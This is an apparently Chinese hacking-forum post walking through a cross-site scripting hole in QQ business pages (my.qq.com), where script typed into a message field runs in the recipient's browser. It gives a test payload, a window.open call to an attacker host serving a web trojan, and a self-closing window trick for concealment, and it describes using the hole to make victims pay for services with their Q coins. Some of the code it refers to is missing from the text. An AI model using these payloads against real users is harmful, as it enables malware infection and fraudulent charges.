这阶段跨站闹的很凶..QQ也接连出了几个跨站漏洞..这不.QQ业务也出了跨站漏洞..经过测试
不论是QQ会员,黄钻贵族,QQ炫铃.等..都可以跨站..
这个漏洞也不是我发现的..是我的好友netshow告诉我的..听他说也是经过玄猫指点..所以在这里也要感谢玄猫
..又为我们带来了一经典之作..
具体危害和玄猫写过的一篇"QQ跨站漏洞巧利用强迫他人为你购买QQ秀"差不多..只是这个是用来购买腾讯服务
的...这个危害比那个还要大...如果你的QQ币足够支付的话.
首先我们来看一下这个漏洞.
首先进入
http://my.qq.com/
打开业务列表..随便点个业务把..在"索要留言"里写代码:alert('fhod');
这时候对方QQ会出现系统提示..图1..


这里我们的留言很明显就被对方看到了..所以我们在留言的时候最好在前
面写一段话....然后后面在写alert('fhod');
然后对方查看的时候就会在浏览器上弹出一个内容为"fhod"的对话框.图2


那我们能不能利用它来做些什么呢?其实这个漏洞是完全可以让对方给你购买服务的..前提是只要对方查看了..
不过我对脚本不是很懂,.所以没做深入研究..我想只要把玄猫的那个看懂了..就可以举一反三..彻底的利用这
个漏洞..
我简单说下我怎么做的把
测试的时候在留言处写进行挂马是行不通的..我写了

然后查看接受的代码就成了
　　　　　　　　　　　　 QQ炫铃服务费用：
　　　　　　　　　　　　
　　　　　　　　　　　　
　　　　　　　　　　　　 预支付
　　　　　　　　　　　　　
　　　　　　　　　　　　　 个月，总金额为:
　　　　　　　　　　　　　 Q币
　　　　　　　　　　　
　　　　　　　　　　　 您可以修改预支付的
月数。
　　　　　　　　　　
　　　　　　　　　　
　　　　　　　　　　　
　　　　　　　　　　　　
他的留言：试下这个
　　　　　　　　　　　
很显然..腾讯给过滤了...
而用
window.open("http://218.xx.xx.2xx/kz1.htm");
就完全可以执行成功....然后我们可以在kz1.htm里写这么一段代码

window.opener=top; window.close();
上面那个http://218.xx.xx.xxx/kz.htm　是我们的网页木马地址/..具体什么马视个人需要而定
window.opener=top; window.close();
打开此页面就即刻关闭窗口..起隐蔽的作用
或者在一个HTM页面写如以下代码

上面代码意思是给1988415这个号购买一个月的服务..留言是123
在网上看到的以前老方法..自己试了下出现登陆的页面...可能腾讯已经修改了这个漏洞把..
有兴趣可以试下.
我暂时就研究这么多.这几天累死了....抽空继续研究下..先发出来..大家有兴趣的欢迎继续研究..有了成果记
的与我分享!!